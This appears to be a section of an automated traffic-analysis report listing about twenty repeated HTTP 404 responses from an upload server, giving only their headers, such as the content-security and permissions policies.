                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Zl26J3pqXRZay-1MKECL2Z6LS_lL46DX4gvus9UWPE1TAxa_adE-Pse_9mRlHLiH3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:11 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Ti0ksmSDpVsvysrtMIa1Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5umVmUg-MvcMbTn5tZdJbqzoTbojs_Z-LeKWdq0tVTznRs7hYnGxMWY_M2Ff892ifNV4hfgU4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:12 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-s4jzROrwxHyBJb_MKRY58g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC64IAVxJGF8T-h5GQXygONngQOY4R1i_k1I2XeGay_IzRpdhxc8DUJDu-h_cvKac7_RContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:12 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZligGJ1qrhVe58-cA3j4qQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC620esF-uKQ9ROJwllc306WaBWmYJK6EDVE9xG9f9G-gxLQWxGjxhCAOm07RpOgrqkA4IF8w4kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:13 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dopRXCngxMSUY5eB-oVMQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4q2pP4cazBBrZgHE1dahT-fM5tYyBg3BDDg9UBD3Nbc7zyOOEseBCLRYg0K0oduvigContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:13 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-t3pyx11VOiAI5lJ-5-AZZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Dc_mBqT-zgYrZhOoZMeb8yicPOvIMdzGayyutsu7ru2PyDAT_QC6lgO5pALfIF0R8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:14 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-GpYxYobVnCy6LUApWCTmlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4SeyMHj9Lfe454oefTwB1QRoxiNWRVSc_WbOg3bN2ewcQxotIigl-uUSHTBtbZDkmsaRSVEVwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:16 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-wc7_UZj-iAnlGJT36rh-8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC64g9J-pAR9wvUI_5qm8AcD0VYDCCp5MABERRLaPLMdeu2vfvPYtIGEWhHOxTj6ClET817RlBMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:17 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d7dacOvTkv3MZCE7L9DuCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6CrFhy2F3i4tvTNMrYK0lnsTZNxNX0d1RMHv6uIZDTLsZk7oBaJFwRZWbhgDjnhVxSQnYwEQMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:17 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d8v0ZT8x75wYa0srEFz8hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lJz83018VXRdQ4a9G7hLKo0ke6jNf9mJWFPbl-fCZQ2OXkZ3E01CmUR-Iaa2WDqPTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:18 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-miKaqIPUpDgbQsEl3J7uIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC68X0DEZuZGF9EP_tEwW6gZwICK5_DiVMVqVt8GVxRBqsrYM_Iu0l4fxfZ8qPNdjlIdiRCwXsQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:20 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-aAaa0g681WRQJ_ZVU40l2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4aHx6kQx9R0gdQecS8gxBJwEPFlxf-gac1xVtxndf5zKGiamBCtWZQsn_G3lLwKU_vContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:21 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Wjhl5MgzCXV6qubf8yveSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75riiyg07JRZ82cjhL0AhzyVptjPrpClYAviJMsgygb9eKwMueTiHDo6APwfstEMopUiL4H6EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:21 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3_o8MS6sXrgJM7n4ilZmUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6MwKtzHmZ2bbT6CwnaRicr0V1dFH5rR2GhAzsDxT_x7e-V85J73ewXQ6OfwublC4H3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:22 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-nYQbe5-txgoljAzAJ9b_jQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC61_rGOnycPCctoJ8TiXYjqmHjR042_FJSNKjMnarKAsfRO5JZktKlrZJrZSPjeS8CimEPTfbQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:23 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-OYiuhYUyRFltbS14QQB4JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5r2163Pzy6uOnLHNpuCmMSCEAFK9eGxBgKr9ypPpIuvLfn9t0iFChWwK2OEOBjVuDOZ-xugtEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:24 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jNcORdSgBUTnpuYMUmfiqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6latu-ltevqjRSMv2VQN9w-OkVV3R_tp-Pm368T6z9MxkmAMgzwcd1Bg-wA1wn8ubId8PfjksContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:24 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4xplyiBahHI_DGY1SPhdDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6kDJbN7zX9UiQaLaq_zNWtykQe-sBqQQ5aThNJrtSrVcfBfNY9Jm323_17eFcQHTLHGUeatx0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d6VTnlyYKfhyX2fblp4Pxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5wMEmhi1BRr5hktP17awyTKBahfKDz01VXDSaTz9R7Lt_9pGf81HagBb9TsxBeL-WbContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-gPanHqEd2URh_4h4N4U9tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4zGnfLvgCmxuNNwaKWAvZ_YarBIXSutw-_0tlU5EW9_IVsjsgGzeZT-9y6H8R7P6wmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:26 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-i-lbYyxJh-N9RelQkPEVHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
